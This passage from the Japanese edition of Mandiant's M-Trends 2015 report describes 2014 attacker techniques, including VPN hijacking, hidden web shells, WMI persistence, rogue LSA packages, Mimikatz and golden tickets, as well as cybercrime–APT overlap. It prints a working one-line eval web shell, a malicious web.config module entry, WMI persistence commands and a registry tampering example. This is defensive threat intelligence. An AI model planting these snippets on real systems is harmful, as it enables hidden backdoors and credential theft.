• 証明書を利用した2ファクタ認証:VPNの認証で、第2ファクタとしてユーザーごとのデジタル証明書を要求される場合、攻撃者はMimikatzなど一般に入手可能なツールを使用して、侵入先のエンドユーザー・システムから証明書を抽出します。また、平文のメールに添付する、公開ネットワーク・ファイル共有に保存するなど、リスクが高い手段でユーザーに配布されたVPN証明書を盗み出しているケースもありました。

他に、VPNの認証を完全に回避するエクスプロイトを使用した攻撃も、少数ながら確認されています。このような攻撃で使用されていた脆弱性の1つが「Heartbleed」です。2014年4月に発覚して大変な騒ぎとなったHeartbleedは、T L S (Transport Layer Security)のHeartbeat拡張に存在する脆弱性です。この脆弱性を悪用された場合、攻撃を受けたサーバーや各種デバイスは、メモリ上のデータ(最大64キロバイト)をリクエストに応じて返してしまう恐れがあります。

Heartbleedが発覚した当初、この脆弱性の影響範囲や、暗号鍵、ユーザーの認証情報といった機密データが実際に盗み出される可能性について、セキュリティ研究者らは議論を重ねていました。

当時想定されていた最悪のシナリオは、すでに現実化しています。Heartbleedの情報開示から数週間内に発生したインシデントにおいて、攻撃者が同脆弱性を悪用して正規ユーザーの認証済みVPNセッションを乗っ取り、認証情報なしでネットワークへのアクセスに成功していたのです。さらに続く数週間においても、Heartbleedを利用して標的のVPNインフラストラクチャにアクセスする別の攻撃が複数、確認されています。

Page 16: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

14 www.mandiant.com

ネットワーク内部への侵入

足がかりの確立

権限の昇格

内部の偵察

目的達成

ネットワーク内の移動

アクセスの維持

VPNの乗っ取り標的のVPNへのアクセスに成功した攻撃事例が、かつてないほど多く確認されました。

不正なセキュリティ・パッケージ攻撃者は、Windowsのセキュリティ・パッケージの拡張機能を使用して、バックドアやキーロガーを仕掛けていました。

Webシェルの隠蔽攻撃者は2014年も、Webベースのマルウェアを仕掛けて隠蔽する新たな手法を編み出してきました。Mandiantでは、次のような複数の手法を確認しています。• SSL暗号化を使用するサーバーにシェルを仕掛け、監視の網をかいくぐる

• わずか1行で構成される「eval」シェルを正規のWebページに埋め込む

• サーバーの構成ファイルを改ざんして不正なDLLを読み込ませる

WMIとPowerShellの悪用アクセスの維持、データの収集、ネットワーク内の移動のために、Windows標準の強力なコンポーネントであるWMIとPowerShellを悪用する攻撃が増加していました。

Kerberosを使用した攻撃攻撃者は、ドメイン管理者の権限を取得した後、Kerberosの「ゴールデン・チケット」を利用して、任意の特権アカウントとして認証を受けていました。この攻撃は、ドメインのパスワードがリセットされた後でも有効に機能します。

プレーンテキストのパスワード攻撃者は、Mimikatzユーティリティの再コンパイル版を使用することで、アンチウイルスによる検知を免れながら、メモリからプレーンテキストのパスワードを盗み出していました。

防御側が進化すれば、攻撃側もそれに適応してさらなる革新を遂げます。2014年、Mandiantは攻撃ライフサイクルの各段階で新たな手口をいくつか確認しました。その代表例を次に示します。

図4:Mandiantの調査で確認された新たな攻撃手法

いずれのケースについても、攻撃を発見する手がかりとなったのはVPNログでした。正規のユーザー・セッションのソースIPアドレスは、攻撃者に乗っ取られた途端、攻撃元の地域のIPアドレス管理団体が発行するアドレス・ブロックに切り替わります。このIPアドレスの変化が乗っ取りを見つけ出す糸口になりました。

マルウェアの隠蔽と偽装

マルウェアを巡っては、攻撃側と防御側の間で以前から隠蔽と検知の激しい攻防が繰り広げられており、その傾向は2014年に入っても変わっていません。攻撃活動を偽装し、システムに感染させたマルウェアを隠蔽するための新しい手口がいくつか確認されています。

Webシェルの隠蔽

WebベースのバックドアやWebシェルは、すでに10年ほど前から存在しているマルウェアの一種です。ネットワーク型/ホスト型のアンチウイルス・ソリューションによる検知を免れる新しい偽装手法が次 と々登場しており、現在でも標的型攻撃において広く使用されています。

Mandiantでは、Secure-Socket Layer(SSL)暗号化を利用するサーバーにWebシェルを仕掛けるという巧妙な手法が使われていた事実を複数の攻撃事例で確認しています。この場合、バックドアが送受信するすべてのリクエストは、サーバーが保持する正規の秘密鍵で暗号化されるため、 セキュリティ・ソリューションでSSLトラフィックを検査できるよう構成していない環境では、攻撃者による不正な活動は検知できないことになります。

最近では、公開WebサービスにSSL暗号化を適用するケースが増えていることもあり、この攻撃手法は今後さらに普及するものと予想されます。

攻撃の隠蔽手法としては、正規のWebページに「eval」シェルを埋め込むという方法も使用されています。evalシェルとは、HTTPリクエストのパラメータとして送信されたコードを実行するための小さなバックドア・スクリプトを指します。evalシェルは数十バイト程度のサイズであるため、 HTMLファイルの中に容易に紛れ込ませることができます。

Page 17: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 15

evalシェルが埋め込まれたWebページは、通常のHTTPリクエストに対しては通常どおり描画されます。しかし攻撃者が特定のパラメータ付きでそのページをリクエストすると、送信された不正なコードがeval文によって解析され、実行されます。

Webページに埋め込み可能なevalシェルの全体を図5に示します。攻撃者のWebシェル・クライアントは、リクエスト・パラメータのp1に不正なコードを埋め込みます。

Webベースのマルウェアの中でも特に巧妙なのが、最後に紹介する次のマルウェアです。攻撃者はまず、 Microsoft Internet Information Services(IIS) によるWebサーバーの構成ファイル(web.config)を改ざんし、不正なHTTPモジュールがWebサーバーに読み込まれるようにします。web.configの改ざん例(一部を編集した抜粋)を図6に示します。

この改ざんにより、サーバーは共有モジュール・ディレクトリからBadModule.dllを読み込み、以降に受信するすべてのWebリクエストの処理にこのモジュールを使用するようになります。 BadModule.dllは、ユーザーの認証情報を含め、サーバーに送信されるWebリクエストの内容を解析、キャプチャします。図6はあくまで例であり、実際の構成ファイルに記述されたモジュール名は、実在するWindowsのDLLを装った名前となっています。また攻撃者は検知を免れるため、モジュール・ファイルと構成ファイルのタイムスタンプも改ざんしています。

WMIを利用したマルウェアの永続化

Windows Management Instrumentation (WMI)は、システム管理のための豊富な機能とインタフェースを提供するWindowsのコア・コン

ポーネントです。アプリケーションやスクリプト言語(PowerShellやVBScriptなど)では、WMIを使用してデータの収集、低レベルのOSコンポーネントとの相互作用、コマンド実行などの処理を行います。WMIはイベント・フレームワークとしての機能も備えており、特定オブジェクトの状態の変化に応じてアプリケーション(攻撃者が使用する場合はマルウェア)を実行することが可能です。

検知を回避するための手段としてWMIを使用する攻撃は、従来からかなり希でした。おそらく、WMIとの相互作用は複雑で、検知の回避にはもっと単純な手法で十分だったためと考えられます。しかし2014年には、マルウェアを密かに永続化する手段としてWMIを使用する脅威グループが少数ながら確認されています。

確認された攻撃では、主にPowerShellを使用して次の3つのWMIオブジェクトを作成していました。

• イベント・フィルター:マルウェアを永続させるための仕組みとして機能する、繰り返しのイベント(特定の時刻や起動後の経過時間など)をポーリングします。

• イベント・コンシューマ:特定のスクリプトやコマンドを実行してイベントを「消費」します。多くの攻撃では、任意のコマンドおよび引数を実行するコマンドライン・イベント・コンシューマ、VBScriptを実行するActive Scriptイベント・コンシューマが使われていました。

• フィルターからコンシューマへのバインド:フィルターの作動時に特定のコンシューマが実行されます。

<%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%>

図5:「eval」Webシェルの例

<!--HTTP Modules --> <modules> <add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” /> </modules>

図6:改ざんされたweb.configからの抜粋

Page 18: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

16 www.mandiant.com

WMIは、イベント・フィルターのクエリを定期的にポーリングします。次の例では、毎日8時5分にフィルターの条件が満たされます。2

フィルターが作動すると、WMIは自動的に、そのフィルターにバインドされたイベント・コンシューマを実行します。次に示したのは、Base64エンコードの不正なコードを引数にしてPowerShellを実行するコマンドライン・コンシューマの抜粋です。

3

攻撃者が、PowerShellコマンドを実行して3つのWMIイベント・オブジェクトを作成します。コマンドまたはスクリプトを実行するコンシューマ、繰り返しのイベントをポーリングするフィルター、そしてフィルターをコンシューマに関連づけるバインドです。

1WMIのRoot Subscription名前空間

イベント・コンシューマ「このスクリプトまたはコマンドを実行...」

イベント・フィルター「繰り返しのイベントを

ポーリング...」

フィルターからコンシューマへのバインド「このフィルターを使用してこのコンシューマを実行」

Set-WmiInstance

SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60

CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."

図7:WMIを使用したマルウェアの永続化の例

Page 19: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 17

図8は、WMIのコマンドライン・イベント・コンシューマを作成するPowerShellの構文例です。ここで作成されたイベント・コンシューマは、 B a s e 6 4エンコードの文字列を引数にしてpowershell.exeを実行します。この文字列には、任意のPowerShellコード、たとえば単純なダウンローダやバックドアのコードを指定できるため、スクリプト・ファイルをディスク上に用意する必要がありません。イベント・コンシューマを適切なイベント・フィルターにバインドしておけば、コンシューマを繰り返し実行することも可能です。

攻撃者がマルウェアの永続化にWMIを使用する目的は、フォレンジック分析の妨害と考えられます。 PowerShellコマンドを使用して、ローカルでもリモートでも実行できるフィルターとコンシューマを作成できるうえ、永続化を実現するその他の多くの仕組みと異なり、レジストリに痕跡が残らないからです。

またディスク上のオブジェクトは複雑なデータベース(WMIリポジトリのobjects.data)に格納されるため、分析が困難です。さらにWindowsでは、新たに作成された、または作動したフィルターとコンシューマの監査は、デバッグレベルでのログが無効になっていると実行されません。デバッグレベルでのログはデフォルトでは無効状態で、また大量のイベントが記録されるため長期的な使用には適していません5。

不正なセキュリティ・パッケージ

Windowsローカル・セキュリティ機関(LSA)のセキュリティ・パッケージを使用し、アンチウイルス・ソリューションによる検知を免れながら、マルウェアを自動的に読み込む攻撃も何件か確認されています。これは、マルウェアの永続化にレジストリを使用する攻撃としては珍しい手法です。 LSAのセキュリティ・パッケージは一連のDLLで構成されており、システムの起動時にLSAによって読み込まれます。各パッケージは、HKLM\SYSTEM\CurrentControlSet\Control\Lsaというレジストリ・キーの値で設定され、それぞれの値には、 %SYSTEMROOT%\system32\ディレクトリから読み込むファイルの名前(拡張子なし)を参照する文字列のリストが指定されています。

LSAのパッケージはLSASS.EXEによって自動的に読み込まれるため、管理者権限を持つ攻撃者は、エントリを追加、編集して不正なDLLを永続化できます。Mandiantが2014年に調査を実施したあるセキュリティ・インシデントでは、Security Packagesの値を改ざんして、多段式バックドアのローダー・コンポーネント(tspkgEx.dll)を永続化するという手法が使用されていました6。

改ざん前後の値の変化を図9に示します。

この結果、C:\WINDOWS\system32\tspkgEx.dllがシステム起動時にLSASS.EXEによって読み込まれるようになります

Set-WmiInstance -Namespace “root\subscription” -Class ‘CommandLineEventConsumer’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:\WINDOWS\System32\Windows- PowerShell\v1.0\powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8AbQ...<SNIP>”;Run- Interactively=’false’}

図8:WMIのイベント・コンシューマを作成するPowerShellコマンド(抜粋)

SECURITY PACKAGES(改ざん前): kerberos msv1_0 schannel wdigest tspkg pku2uSECURITY PACKAGES(改ざん後): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgEx

図9:マルウェアが読み込まれるように、HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packagesの値を改ざん

5 Mandiantの年次カンファレンス「MIRcon 2014」では、WMIとPowerShellのそれぞれを利用した攻撃について、手法の詳細、事例、推奨される検知およびフォレンジック分析のアプローチを解説する講演が行われました。講演で使用されたプレゼンテーション・ファイルは、https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf、https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Investigating_Powershell_Attacks.pdfで(ともに英語)公開されています。

6 ここではDLL名を編集しています。

Page 20: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

18 www.mandiant.com

被害を受けた組織のうちMandiantがインシデント・レスポンスを実施したほぼすべてで、アンチウイルス・ソフトウェアを導入していたにもかかわらず、Mimikatzの検知に至りませんでした。広く使用され、知名度も高い同ツールを検知できなかった理由は、多くの攻撃者がソースコードに改変を加え、再コンパイルしているためです。

LSAは拡張に対応しており、カスタム・セキュリティ・パッケージを使用してログオン時にユーザーの認証情報を処理することもできます。不正なセキュリティ・パッケージでこの機能を悪用すれば、ログオン・イベント時にパスワードをプレーンテキストでキャプチャできます。

2014年には、まさにこの目的でマルウェアをセキュリティ・パッケージとしてLSAに読み込ませる標的型攻撃が確認されています。また一般に入手可能なツールキットMimikatz7にも、読み込み時にパスワードを盗み出すセキュリティ・サポート・プロバイダー「mimilib ssp」が用意されています8。

入手が容易になったパスワード

認証情報を盗み出すツールが広く入手可能となった結果、Windows環境でのパスワード収集と権限昇格は従来よりもはるかに容易になりました。2014年に確認された標的型攻撃では、攻撃者は主に次の2つの手法を使用しています。

• パスワードの代わりにハッシュを使用する「Pass-the-hash」により、盗み出したNTLMハッシュで認証を突破する

• Mimikatzを使用して、メモリからプレーンテキストのパスワードを抽出する

Microsoftは、Windows Server 2012 R2とWindows 8.1で対策を強化し、上記の手法によるパスワードの窃取をある程度防止できるようにしましたが(完全に防止できるようになったわけではありません)、Mandiantが2014年にインシデント・レスポンスを実施した組織のほとんどは、まだドメインのサーバーにWindows Server 2008、エンドポイントにWindows 7を使用しています。

Pass-the-hashは、現在でも十分に通用する確立済みの手法です。特に、複数のシステムでローカル管理者のパスワードが同じ場合に高い効果を発揮します。Mimikatzはさらに一歩踏み込み、オペレーティング・システムがシングル・サインオン用にメモリに保持しているプレーンテキストのWindowsパスワードを抽出します。

社員用のワークステーションが攻撃を受けた場合、漏えいする情報はその社員のドメイン・アカウントのパスワードだけで済みます。一方、リモート・デスクトップ・プロトコル(RDP)やPsExecユーティリティ経由での対話型ログオン・セッションが頻繁に発生する共有サーバーが狙われた場合、漏えいするパスワードは膨大な数に上る恐れがあります。最初に少数のシステムが攻撃を受けた場合でも、そこを起点として瞬く間に、Active Directoryドメイン全体に被害が広がる可能性があります。

被害を受けた組織のうちMandiantがインシデント・レスポンスを実施したほぼすべてで、アンチウイルス・ソフトウェアを導入していたにも関わらず、Mimikatzの検知には至りませんでした。広く使用され、知名度も高い同ツールを認識できなかった理由は、多くの攻撃者がソースコードに改変を加え、再コンパイルしているためです。また一部の攻撃者は、メモリ内だけで動作するPowerShellスクリプト「Invoke-Mimikatz」などの亜種を使用しています。

2014年には、最近のWindowsドメインにおけるデフォルトの認証メカニズムであるKerberosを狙った新たな攻撃手法も複数確認されています。中でも特に危険性が高いのが、Mimikatzの「ゴールデン・チケット」を使用した攻撃です。ドメイン・コントローラを乗っ取った攻撃者は、この手法を用いてあらゆるユーザーのチケット保証チケットを生成できます。

7 https://github.com/gentilkiwi/mimikatz5 8 Matt GraeberはMIRCon 2014カンファレンスで、不正なセキュリティ・パッケージの詳細とそれらを検知して使用を制限する仕組みについて講演を行っています。講演で使用されたプレゼンテーション・ファイルは、https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf(英語)で公開されています。

Page 21: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 19

ゴールデン・チケットの最大の特徴は、オフラインで生成できるうえ有効期限もなく、あらゆるアカウントになりすますことができる点です。パスワードのリセットも効果はありません。また侵入先の環境が再構築されても、再度侵害して、すぐさまドメインの管理者権限を取得することが可能です。

事後での対応になってしまいますが、この攻撃に対処するには、Kerberosの鍵配布サービスのアカウントkrbtgtのパスワードを2回連続でリセットする以外に方法はありません。その後はアカウントのパスワード履歴が消去され、発行済みのすべてのKerberosチケットが無効となります。

WMIとPowerShellを使用してネットワーク内を移動

Windows環境に対する従来の攻撃で、ネットワーク内の移動やコマンド実行の場合には、Windowsの標準ユーティリティ(netやatなど)、カスタム・マルウェア、バッチ・ファイル、Visual Basic(VB)スクリプト、標準的な管理ツール(PsExecなど)の使用が一般的でした。どのツールも十分な信頼性を備え、使い勝手にも優れていますが、攻撃者の立場からすると、攻撃の痕跡や証拠を残してしまうという欠点を抱えています。

その後、2013年から2014年にかけて、一部のAPT攻撃(Advanced Persistent Threat:高度で持続的な標的型攻撃)グループが使用する手法に明らかな変化が見て取れるようになりました。 Windows環境のネットワーク内での移動や認証情報の収集、役に立つ情報の検索に、WMIとPowerShellを使用するケースが増えてきたのです。

同様に、セキュリティ研究者やペネトレーション・テストを実施する技術者の間でも、PowerShellを取り入れる動きがここ数年広まっています。その結果、攻撃側と防御側のどちらにとっても、スキルの向上に役立つ情報やソースコードが広く流通するようになりました。

前述したように、攻撃者はマルウェアを永続化して侵入先ネットワークへのアクセスを維持するためにWMIイベントを使用していますが、加えてWMIの機能をシェルやスクリプトに拡張するコマンドライン・ツールwmic.exeも使用しています。攻撃者は、リモート・システムへの接続、レジストリの改変、イベント・ログへのアクセス、そしてコマンド実行などの処理にWMIを利用しています。通常、リモートからのWMIコマンドは、最初のログオン・イベントを除き、アクセス先のシステムに侵入の痕跡をほとんど残しません。

Mandiantが2014年に対応した複数のインシデントにおいて、攻撃者はネットワーク内での移動や認証情報の収集に、PowerShellのリモート・コマンドとメモリ内で実行可能なスクリプトを使用していました。PowerShellのコードは、アクセス先システムのディスクに一切データを残さずにメモリ内で実行できるため、攻撃の痕跡を最小限に留めることができます。また多くの環境に標準でインストールされている古いバージョンのPowerShellは、実行されたコードの詳細なログを記録しません。

要点:高度な脅威グループは、ツールや手口を継続的に進化させるアプローチで、システムに残される活動の痕跡を抑え、検知を回避しようと目論んでいます。防御側の組織は、エンドポイント・システム、ログ・リソース、各種ネットワーク・デバイスに対し、リアルタイムの監視と遡及的なフォレンジック分析の両方を実施できるように手を打つ必要があります。攻撃者の一歩先を行くためには、平時のネットワーク・アクティビティのベースラインを把握したうえで、そのベースラインから逸脱しているアクティビティを予防措置的に追跡する対策が重要となります。

Page 22: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

20 www.mandiant.com

傾向4: あいまいになる境界線 - 互いの手口を 模倣するサイバー犯罪者とAPT攻撃者Mandiantが2014年に実施したインシデント・レスポンス事例からは、もう1つの新たな傾向が見て取れます。サイバー犯罪者がAPT攻撃者の手口を模倣するのと同時に、サイバー犯罪者の間で広く使用されているツールをAPT攻撃者が導入し始めているのです。このように両者の攻撃手法が同化していく中で、インシデントの影響範囲を把握し、リスクを踏まえた適切なセキュリティ戦略を策定するには、攻撃の目的を見極める取り組みが重要となります。

Mandiantは2014年を通じて、ロシアの脅威グループが関与しているサイバー攻撃の調査を実施してきました。いず

れの攻撃にも、実行者は犯罪グループまたは国家組織のどちらなのか、判別が難しいという特徴があります。このようにツールや手法による攻撃者の判別が難しい場合に、インシデントの影響範囲を把握するためには、攻撃者の意図の分析が欠かせません。

Mandiantが確認した、金銭的利益を目的とするいくつかの標的型攻撃グループは、純粋なサイバー犯罪というよりもむしろ、国家レベルのAPT攻撃を思わせる痕跡を残していました。2014年に確認された、APT攻撃グループとサイバー犯罪グループが使用する手口の共通点をP.21の一覧に示します。

攻撃の意図を見極める重要性

APT攻撃グループとサイバー犯罪グループの手口が重なりを見せる中で、サイバー攻撃の調査担当者や分析担当者には、先入観に左右されない意識が求められます。1つの手口やツールを個別

に評価するだけでは、攻撃者の意図は把握できません。2014年に発生したロシアを舞台とするサイバー攻撃事例は、攻撃の技術的な特徴を解釈する際に、攻撃者の最終的な目的を分析する重要性と課題を示しています。

2014年10月、Mandiantはロシア政府のために政治的、軍事的な機密情報を収集していたと思われる脅威グループ「APT28」の活動をまとめたレポートを発表しました。同グループは数年にわたり、防衛関連企業や政府機関、軍隊、政府間組織を標的に活動を展開していました。

またMandiant以外の研究者チームも、APT28と同様、ロシア政府のためにスパイ活動を行っていたと見られる、ロシアの別の脅威グループの存在を明らかにしています。このグループは、「Sandworm Team」9、「Quedagh」10、「BE2 APT」11などの名称で呼ばれています。

9 “Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day.” iSight Partners. 14 Oct. 2014. Web. 2 Dec. 2014.;

10 https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf11 https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/

Page 23: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 21

手口 サイバー犯罪グループとAPT攻撃グループによる使用例

ソーシャル・ エンジニアリング

ソーシャル・エンジニアリングはAPT攻撃グループの専売特許ではありません。2014年には、金銭的利益を目的とする脅威グループによるスピア・フィッシング・メールの使用事例が確認されています。 このグループは、最初に標的をマルウェアに感染させる手段、およびマルウェア駆除後に再度感染させるための手段としてスピア・フィッシング・メールを使用していました。

対話型のソーシャル・エンジニアリングも、サイバー犯罪グループとAPT攻撃グループの両者に共通する手口です。ある事例では、金銭的利益を目的とする攻撃者が人気のソーシャル・メディアにアカウントを作成して標的企業の社員に近づき、バックドアをダウンロードさせようと誘導しました。一方、国家レベルのAPT攻撃グループと思われる「APT3」も、ある女性を装ったソーシャル・メディア・アカウントを利用して、ある企業の社員と3週間にわたりメッセージのやりとりを続けた後、バックドアを仕掛けた「履歴書」をその社員のメール・アドレスに送信。さらに別の社員にも、IT管理者の氏名や使用しているソフトウェアのバージョンなど、社内状況を探るようなメッセージを送っていました。

独自開発のマルウェアおよびツール

金銭的利益を目的とするサイバー犯罪グループとAPT攻撃グループのどちらも、独自のツールを開発している事実が確認されています。たとえばあるサイバー犯罪グループは、標的のネットワークに数年間潜伏して活動しながら、60種類を超えるマルウェアやツールを開発し、攻撃に利用していました。またロシアのAPT攻撃グループであるAPT28は、7年以上にわたってマルウェアを体系的に進化させ、侵入先ネットワークへの長期滞在を可能にするマルウェア・プラットフォームを作り上げていました。

クライムウェア

クライムウェアとは、主に犯罪の遂行を目的とする、一般に入手可能なツールキットや有償販売されているツールキットを指します。ただし、金銭的利益を目的するサイバー犯罪者だけが使用するとは限りません。たとえば活動拠点がロシアと考えられるあるAPT攻撃グループは、ゼロデイ・エクスプロイトを利用して、サイバー犯罪者の定番ツールキット「BlackEnergy」をインストールしていました。またリモート・アクセス・ツールは、APT攻撃グループとサイバー犯罪グループのどちらにも重用されています12。以上の事実が示すように、使用ツールだけでは攻撃者のタイプを正確に判断できません。

アクセスの維持/ マルウェアの永続化

金銭的利益を目的とするサイバー犯罪は、必ずしも力づくで実行されるわけではありません。目的を達成するまで、長期にわたりネットワークに滞在するのはAPT攻撃グループの特徴ですが、金銭的利益を目的とするサイバー犯罪グループも、同様の潜伏能力を備えつつあります。たとえばある事例では、サイバー犯罪グループがWindowsのよく知られたスタートアップ・レジストリを使用するという方法で、システムの起動時に密かにマルウェアを実行していました。また、5年以上にわたって同じ侵入先ネットワークへのアクセスを維持していた事例、ひとたびネットワークから排除された後も繰り返しアクセスしていた事例も確認されています。

盗み出すデータの種類

データ窃盗は幅広い種類のデータを対象に、大規模データセットに対して行われています。中でも以前から標的とされているのが、個人の特定につながる情報(PII)が大量に保存されたデータ・リポジトリです。PIIを狙うのは本来、詐欺行為での利用や闇市場での転売による金銭的利益を目的とする脅威グループでしたが、最近ではAPT攻撃グループなど、金銭的利益とは無関係な目的でもPIIに目を付けるようになっています。たとえば、APT18などのAPT攻撃グループがPIIの窃盗に関与している事実が確認されています13。

図10:サイバー犯罪グループとAPT攻撃グループに共通する手口

12 https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html13 APT18は中国に拠点を置く脅威グループです。詳細については、https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html(英語 )を参照してください。

Page 24: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

22 www.mandiant.com

Sandworm Teamなどが攻撃対象としていた組織はAPT28と似通っていますが、両グループには大きな相違点もあります。たとえば前者は、ゼロデイ・エクスプロイトや犯罪ツールを使用しており、米国の重要インフラを攻撃していた可能性があります14, 15。

この攻撃で使用されていたマルウェアとインフラストラクチャを分析したところ、同グループはBlackEnergyツールキット16を使用して、ロシアとの緊張関係が続くウクライナの組織を標的としている事実が判明しました。またこのグループは、同じくBlackEnergyを使って、産業プロセスや重要インフラの制御装置として広く利用されているSCADA(Supervisory Control And Data Acquisition)システムを攻撃したともいわれています17。

この攻撃で狙われたのは、メーカーの試作品でも、金銭的価値のある機密情報や知的財産を保存、転送するネットワークでもなく、さまざまな産業で使用されている製造装置です。この事実から攻撃者は、標的システムの弱点を探るため入念な偵察活動を行っていた可能性があると考えられます。このような活動でクライムウェア・ツールキットBlackEnergyを使用するメリットは、身元の発覚を防ぎ、いざというときに犯行を否認できるという点です。

両グループの区別の重要性

攻撃者の目的や素性の把握が重要であるかどうかという点については、セキュリティ研究者の間でも意見が分かれています。代表的な否定的な

意見として、「ネットワーク防御の観点からは、誰がシステムに侵入したかは問題ではない。攻撃を防御し、マルウェアを駆除できればそれでよい」という見方があります。

サイバー犯罪グループとAPT攻撃グループの使用ツールや手口がますます似通ってきた現状は、攻撃者の意図や被害範囲の特定を一層難しくしています。その背景には、攻撃者の巧みな策略はもちろん、不十分な法整備、政府関係者と犯罪者の共犯関係など複雑な問題が絡んでいます。

一方、このような不透明な状況下で、攻撃者の意図や目的の把握は、適切な対応方法の判断に役立ちます。たとえば、ある国家政府のために情報を収集しているロシアの脅威グループは、米国の重要インフラ・システムへのリモート・アクセスにクライムウェアを使用しています。一般に入手可能なクライムウェアを使用しているからといってこの攻撃をありがちなサイバー犯罪と見なせば、対応を誤る結果を招きかねません。

ネットワークに侵入したマルウェアへの対処方法は、単純な迷惑行為で偶然感染したマルウェアなのか、国家レベルのサイバー攻撃が招いた結果なのかによって大きく変わります。同様に個人情報が盗み出された場合も、単なるサイバー犯罪者、または国家レベルの攻撃者の違いによって対応を変える必要があります。前者は後者に比べてより直接的な影響を及ぼす可能性があるため、区別して対応する必要があります。

要点:サイバー犯罪グループとAPT攻撃グループが同じようなツールや手口、手順を使用するようになった現在、攻撃者の意図や目的を綿密に分析する取り組みが非常に重要視されています。分析の結果によってはじめて、セキュリティ・インシデントの影響範囲を評価し適切に対応する、また自社が直面している脅威への効果的なセキュリティ戦略の策定が可能となります。

14 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/15 https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml 16 BlackEnergyは、ダイナミック・リンク・ライブラリ(DLL)を使用して新機能を追加できる拡張可能なフレームワークを備えています。DLLプラグインは機能単位で作成し、暗号化ファイルに格納することが可能です。表面上、BlackEnergyはどれも同じツールと見せかけているため、攻撃者の最終的な目的の見極めは容易ではありません。サイバー犯罪者の間で広く普及しており、特に分散サービス妨害(DDoS)攻撃に利用されています(詳細については、http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf、http://blogs.mcafee.com/business/security-connected/evolving-ddos-botnets-1-blackenergyを参照してください。ともに英語)。

17 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/

Page 25: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 23

結論攻撃者は常に進化しています。標的となる組織の業種は拡大の一途を辿り、攻撃手法も変化を続けています。しかし、攻防の様相には従来とほとんど違いが見られません。避けられないセキュリティ侵害に対し、あまりにも多くの組織が無防備な姿をさらし、ネットワークへの侵入に成功した攻撃者に対して、あまりにも長い活動期間を与えているのです。

サイバー・セキュリティが社会で問題視される中、組織に求められているのはデータ侵害に対する認識を変えるこ

とです。恐怖や屈辱をもたらす対象と捉えるのではなく、現実のビジネス上の課題と見なして必要な対策を講じる必要があります。セキュリティ・インシデントは確実に起きるものと考え、自信を持って対処できるよう準備を整えておかなければなりません。

その根拠となるのが、サイバー・セキュリティに対する新しいアプローチです。すべてのセキュリティ侵害を完全に防ぐことは不可能です。しかし、最新の高度なセキュリティ脅威を素早く確実に防御、検知、分析し、対応を誤らなければ、メディアの見出しを飾るような最悪の事態から自社、顧客、取引先を守ることができます。

セキュリティに万全はあり得ません。鉄壁の防御も、想定外の手法によってたやすく崩されてしまいます。 2014年を通しての傾向ですが、脅威グループは新たなセキュリティ対策で妨害された場合でも、容易に引き下がりません。

それでも、テクノロジー、インテリジェンス(脅威情報)、専門知識を正しく組み合わせれば、このセキュリティ・ギャップを小さくすることが可能です。新たな脅威、ツール、巧妙な侵入手法に適応し、攻撃者の一歩先を行くセキュリティ対策を実現できます。

巧妙さと強力な武器、強い動機をあわせ持つ攻撃者は、確かに厄介な存在です。しかし私たちも正面から脅威に立ち向かえば、攻撃を押さえ込むことができるはずです。

Page 26: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

24 www.mandiant.com

Mandiantについて

FireEyeグループのMandiantは、ほぼすべての主要業種の数百に及ぶクライアントを対象に、コンピュータ・ネットワークや端末からセキュリティの脅威を一掃するソリューションを提供しています。当社のソリューションはあらゆる種類の重大なセキュリティ・インシデントに対応しており、Fortune 500企業や政府機関から高い信頼を得ています。セキュリティ・インシデントの発生時には、Mandiantのセキュリティ・コンサルタントが、FireEyeの脅威情報とテクノロジーを駆使してインシデント・レスポンスを実施し、被害からの復旧を支援します。

FireEyeについて

